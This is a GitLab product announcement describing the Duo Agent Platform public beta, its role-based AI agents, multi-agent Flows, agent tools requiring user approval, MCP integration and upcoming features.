GitLab Duo started as an add-on, bringing generative AI to developers through Duo Pro and Enterprise. With GitLab 18.0, it's now built into the platform. We've unlocked Duo Agentic Chat and Code Suggestions for all Premium and Ultimate users, and now we're providing immediate access to the Duo Agent Platform.

We've ramped up engineering investment and are accelerating delivery, with powerful new AI features landing every month. But we're not just building another coding assistant. GitLab Duo is becoming an agent orchestration platform, where you can create, customize, and deploy AI agents that work alongside you and interoperate easily with other systems, dramatically increasing productivity.

“GitLab Duo Agent Platform enhances our development workflow with AI that truly understands our codebase and our organization. Having GitLab Duo AI agents embedded in our system of record for code, tests, CI/CD, and the entire software development lifecycle boosts productivity, velocity, and efficiency. The agents have become true collaborators to our teams, and their ability to understand intent, break down problems, and take action frees our developers to tackle the exciting, innovative work they love.” - Bal Kang, Engineering Platform Lead at NatWest

Agents that work out of the box

We are introducing agents that mirror familiar team roles. These agents can search, read, create, and modify existing artifacts across GitLab. Think of these as agents you can interact with individually, that also act as building blocks that you can customize to create your own agents. Like your team members, agents have defined specializations, such as software development, testing, or technical writing. As specialists, they're tapping into the right context and tools to consistently accomplish the same types of tasks, wherever they're deployed.

Here are some of the agents we're building today:

• Chat Agent (now in beta): Takes natural language requests to provide information and context to the user. Can perform general development tasks, such as reading issues or code diffs. As an example, you can ask Chat to debug a failed job by providing the job URL.

<div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1102616311?badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" referrerpolicy="strict-origin-when-cross-origin" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="agentic-chat-in-web-ui-demo_Update V2"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script><p></p>

• Software Developer Agent (now in beta): Works on assigned items by creating code changes in virtual development environments and opening merge requests for review.

• Product Planning Agent: Prioritizes product backlogs, assigns work items to human and agentic team members, and provides project updates over specified timelines.

• Software Test Engineer Agent: Tests new code contributions for bugs and validates if reported issues have been resolved.

• Code Reviewer Agent: Performs code reviews following team standards, identifies quality and security issues, and can merge code when ready.

• Platform Engineer Agent: Monitors GitLab deployments, including GitLab Runners, tracks CI/CD pipeline health, and reports performance issues to human platform engineering teams.

• Security Analyst Agent: Finds vulnerabilities within codebases and deployed applications, and implements code and configuration changes to help resolve security weaknesses.

• Deployment Engineer Agent: Deploys updates to production, monitors for unusual behavior, and rolls back changes that impact application performance or security.

• Deep Research Agent: Conducts comprehensive, multi-source analysis across your entire development ecosystem.

What makes these agents powerful is their native access to GitLab's comprehensive toolkit. Today, we have over 25 tools, from issues and epics to merge requests and documentation, with more to come. Unlike external AI tools that operate with limited context, our agents work as true team members with full platform privileges under your supervision.

In the coming months, you'll also be able to modify these agents to meet the needs of your organization. For example, you'll be able to specify that a Software Test Engineer Agent follows best practices for a particular framework or methodology, deepening its specialization and turning it into an even more valuable team member.

Flows orchestrate complex agent tasks

On top of individual agents, we are introducing agent Flows. Think of these as more complex workflows that can include multiple agents with pre-built instructions, steps, and actions for a given task that can run autonomously.

While you can create Flows for basic tasks common to individuals, they truly excel when applied to complex, specialized tasks that would normally take hours of coordination and effort to complete. Flows will help you finish complex tasks faster and, in many cases, asynchronously without human intervention.

Flows have specific triggers for execution. Each Flow contains a series of steps, and each step has detailed instructions that tell a specialized agent what to do. This granular approach allows you to give precise instructions to agents in the Flow. By defining instructions in greater detail and establishing structured decision points, Flows can help solve for the inherent variability in AI responses while eliminating the need to repeatedly specify the same requirements, unlocking more consistent and predictable outcomes without user configuration.

Here are some examples of out-of-the-box Flows that we are building:

• Software Development Flow (now in beta): Orchestrates multiple agents to plan, implement, and test code changes end-to-end, helping transform how teams deliver features from concept to production.

• Issue-to-MR Flow: Automatically converts issues into actionable merge requests by coordinating agents to analyze requirements, prepare comprehensive implementation plans, and generate code.

• Convert CI File Flow: Streamlines migration workflows by having agents analyze existing CI/CD configurations and intelligently convert them to GitLab CI format with full pipeline compatibility.

<div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1101941425?title=0&byline=0&portrait=0&badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" referrerpolicy="strict-origin-when-cross-origin" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="jenkins-to-gitlab-cicd-for-blog"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script> <p></p>

• Search and Replace Flow: Discovers and transforms code patterns across codebases by systematically analyzing project structures, identifying optimization opportunities, and executing precise replacements.

• Incident Response & Root Cause Analysis Flow: Orchestrates incident response by correlating system data, coordinating specialized agents for root cause analysis, and executing approved remediation steps while keeping human stakeholders informed throughout the resolution process.

This is where GitLab Duo Agent Platform is taking a truly unique approach versus other AI solutions. We won't just give you pre-built agents. We'll also give you the power to create, customize, and share agent Flows that perfectly match your individual and organization's unique needs. And with Flows, you will then be able to give agents a specific execution plan for common and complex tasks.

We believe this approach is more powerful than building purpose-built agents like our competitors do, because every organization has different workflows, coding standards, security requirements, and business logic. Generic AI tools can't understand your specific context, but GitLab Duo Agent Platform will be able to be tailored to work exactly how your team works.

Why build agents and agent Flows in the GitLab Duo Agent Platform?

Build fast. You can build agents and complex agent Flows in the Duo Agent Platform quickly and easily using a fast, declarative extensibility model and UI assistance.

Built-in compute. With Duo Agent Platform, you no longer have to worry about the hassle of standing up your own infrastructure for agents: compute, network, and storage are all built-in.

SDLC events. Your agents can be invoked automatically on common events: broken pipeline, failed deployment, issue created, etc.

Instant access. You can interact with your agents everywhere in GitLab or our IDE plug-in: assign them issues, @mention them in comments, and chat with them everywhere Duo Chat is available.

<div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1102029239?badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" referrerpolicy="strict-origin-when-cross-origin" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="assigning an agent an issue"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script> <p></p>

Built-in and custom models supported. Your agents will have automatic access to all of the models we support, and users will be able to choose specific models for specific tasks. If you want to connect Duo Agent Platform to your own self-hosted model, you will be able to do that too!

Model Context Protocol (MCP) endpoints. Every agent and Flow can be accessed or triggered via native MCP endpoints, allowing you to connect to and collaborate with your agents and Flows from anywhere, including popular tools like Claude Code, Cursor, Copilot, and Windsurf.

Observability and security. Finally, we provide built-in observability and usage dashboards, so you can see exactly who, where, what, and when agents took actions on your behalf.

A community-driven future

Community contributions have long fueled GitLab's innovation and software development. We're excited to partner with our community with the introduction of the AI Catalog. The AI Catalog will allow you to create and share agents and Flows within your organization and across the GitLab Ecosystem in our upcoming beta.

We believe that the most valuable AI applications are likely to emerge from you, our community, thanks to your daily application of GitLab Duo Agent Platform to solve numerous real-world use cases. By enabling seamless sharing of agents and Flows, we're creating a network effect where each contribution enhances the platform's collective intelligence and value. Over time, we believe that the most valuable use cases from Agent Platform will come from our thriving GitLab community.

Available today in the GitLab Duo Agent Platform in public beta

The GitLab Duo Agent Platform public beta is available now to Premium and Ultimate customers with these capabilities:

Software Development Flow: Our first Flow orchestrates agents in gathering comprehensive context, clarifying ambiguities with human developers, and executing strategic plans to make precise changes to your codebase and repository. It leverages your entire project, including its structure, codebase, and history, along with additional context like GitLab issues or merge requests to amplify developer productivity.

New Agent tools available: Agents now have access to multiple tools to do their work, including:

• File System (Read, Create, Edit, Find Files, List, Grep)
• Execute Command Line*
• Issues (List, Get, Get Comments, Edit*, Create*, Add/Update Comments*)
• Epics (Get, Get Comments)
• MR (Get, Get Comments, Get Diff, Create, Update)
• Pipeline (Job Logs, Pipeline Errors)
• Project (Get, Get File)
• Commits (Get, List, Get Comments, Get Diff)
• Search (Issue Search)
• Secure (List Vulnerabilities)
• Documentation Search

*=Requires user approval

GitLab Duo Agentic Chat in the IDE: Duo Agentic Chat transforms the chat experience from a passive Q&A tool into an active development partner directly in your IDE.

<div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1103237126?badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" referrerpolicy="strict-origin-when-cross-origin" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="agentic-ai-launch-video_NEW"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script><p></p>

• Iterative feedback and chat history: Duo Agentic Chat now supports chat history and iterative feedback, transforming the agent into a stateful, conversational partner. This fosters trust, enabling developers to delegate more complex tasks and offer corrective guidance.

<div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1101743173?title=0&byline=0&portrait=0&badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="agentic-chat-history"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script> <p></p>

• Streamlined delegation with slash commands: Expanded, more powerful slash commands, such as /explain, /tests, and /include, create a “delegation language” for quick and precise intent. The /include command allows the explicit injection of context from specific files, open issues, merge requests, or dependencies directly into the agent's working memory, making the agent more powerful and teaching users how to provide optimal context for high-quality responses.

<div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1101743187?title=0&byline=0&portrait=0&badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="include-agentic-chat-jc-voiceover"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script> <p></p>

• Personalization through custom rules: New Custom Rules enables developers to tailor agent behavior to individual and team preferences using natural language, for example, development style guides. This foundational mechanism shapes the agent's persona into a personalized assistant, evolving toward specialized agents based on user-defined preferences and organizational policies.

<div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1101743179?title=0&byline=0&portrait=0&badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="custom-rules-with-jc-voiceover"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script> <p></p>

• Support for GitLab Duo Agentic Chat in JetBrains IDE: To help meet developers where they work, we have expanded Duo Agentic Chat support to the JetBrains family of IDEs, including IntelliJ, PyCharm, GoLand, and Webstorm. This adds to our existing support for VS Code. Existing users get agentic capabilities automatically, while new users can install the plugin from the JetBrains Marketplace.

<div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1101743193?title=0&byline=0&portrait=0&badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="jetbrains-support-jc-voiceover"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script> <p></p>

• MCP client support: Duo Agentic Chat can now act as an MCP client, connecting to remote and locally running MCP servers. This capability unlocks the agent's ability to connect to systems beyond GitLab like Jira, ServiceNow, and ZenDesk to gather context or take actions. Any service that exposes itself via MCP can now become part of the agent's skill set. The official GitLab MCP Server is coming soon!

<div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1101743202?title=0&byline=0&portrait=0&badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="McpDemo"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script> <p></p>

• GitLab Duo Agentic Chat in GitLab Web UI. Duo Agentic Chat is also now available directly within the GitLab Web UI. This pivotal step evolves the agent from a coding assistant to a true DevSecOps agent, as it gains access to rich non-code context, such as issues and merge request discussions, allowing it to understand the "why" behind the work. Beyond understanding context, the agent can make changes directly from the WebUI, such as automatically updating issue statuses or editing merge request descriptions.

Coming soon to GitLab Duo Agent Platform

Over the coming weeks, we'll release new capabilities to Duo Agent Platform, including more out-of-the-box agents and Flows. These will bring the platform into the GitLab experience you love today and enable even greater customization and extensibility, amplifying productivity for our customers:

• Integrated GitLab experience: Building on the IDE extensions available in 18.2, we're expanding agents and Flows within the GitLab platform. This deeper integration will expand the ways you can collaborate synchronously and asynchronously with agents. You will be able to assign issues directly to agents, @mention them within GitLab Duo Chat, and seamlessly invoke them from anywhere in the application while maintaining MCP connectivity from your developer tool of choice. This native integration transforms agents into true development team members, accessible across GitLab.

• Agent observability: As agents become more autonomous, we're building comprehensive visibility into their activity as they progress through Flows, enabling you to monitor their decision-making processes, track execution steps, and understand how they're interpreting and acting on your development challenges. This transparency into agent behavior builds trust and confidence while allowing you to optimize workflows and identify bottlenecks, and helps ensure agents are performing exactly as intended.

• AI Catalog: Recognizing that great solutions come from community innovation, we will soon introduce the public beta of our AI Catalog — a marketplace which will allow you to extend Duo Agent Platform with specialized Agents and Flows sourced from GitLab, and over time, the broader community. You'll be able to quickly deploy these solutions in GitLab, leveraging context across your projects and codebase.

• Knowledge Graph: Leveraging GitLab's unique advantage as the system of record for source code and its surrounding context, we're building a comprehensive Knowledge Graph that not only maps files and dependencies across the codebase but also makes that map navigable for users while accelerating AI query times and helping increase accuracy. This foundation enables GitLab Duo agents to quickly understand relationships across your entire development environment, from code dependencies to deployment patterns, unlocking faster and more precise responses to complex questions.

• Create and edit agents and Flows: Understanding that every organization has unique workflows and requirements, we're developing powerful agent and Flow creation and editing capabilities that will be introduced as the AI Catalog matures. You'll be able to create and modify agents and Flows to operate precisely the way your organization works, delivering deep customization across the Duo Agent Platform that enables higher quality results and increased productivity.

• Official GitLab MCP Server: Recognizing that developers work across multiple tools and environments, we're building an official GitLab MCP server that will enable you to access all of your agents and Flows via MCP. You'll be able to connect to and collaborate with your agents and Flows from anywhere MCP is supported, including popular tools like Claude Code, Cursor, Copilot, and Windsurf, unlocking seamless AI collaboration regardless of your preferred development environment.

• GitLab Duo Agent Platform CLI: Our upcoming CLI will allow you to invoke agents and trigger Flows on the command line, leveraging GitLab's rich context across the entire software development lifecycle—from code repositories and merge requests to CI/CD pipelines and issue tracking.

Get started now

• GitLab Premium and Ultimate customers in GitLab.com and self-managed environments using GitLab 18.2 can use Duo Agent Platform immediately (beta and experimental features for GitLab Duo must be enabled). GitLab Dedicated customers will be able to use the Duo Agent Platform with the release of GitLab 18.2 for Dedicated next month.

• Users should download the VS Code extension or the JetBrains IDEs plugin and follow our guide to using GitLab Duo Agentic Chat, including Duo Chat slash commands.

New to GitLab? See GitLab Duo Agent Platform in action at our Technical Demo, offered in two timezone-friendly sessions: Americas and EMEA and Asia-Pacific. To get hands-on with GitLab Duo Agent Platform yourself, sign up for a free trial today.

<small>This blog post contains “forward-looking statements” within the meaning of Section 27A of the Securities Act of 1933, as amended, and Section 21E of the Securities Exchange Act of 1934. Although we believe that the expectations reflected in the forward-looking statements contained in this blog post are reasonable, they are subject to known and unknown risks, uncertainties, assumptions and other factors that may cause actual results or outcomes to be materially different from any future results or outcomes expressed or implied by the forward-looking statements.

Further information on risks, uncertainties, and other factors that could cause actual outcomes and results to differ materially from those included in or contemplated by the forward-looking statements contained in this blog post are included under the caption “Risk Factors” and elsewhere in the filings and reports we make with the Securities and Exchange Commission. We do not undertake any obligation to update or release any revisions to any forward-looking statement or to report any events or circumstances after the date of this blog post or to reflect the occurrence of unanticipated events, except as required by law.</small>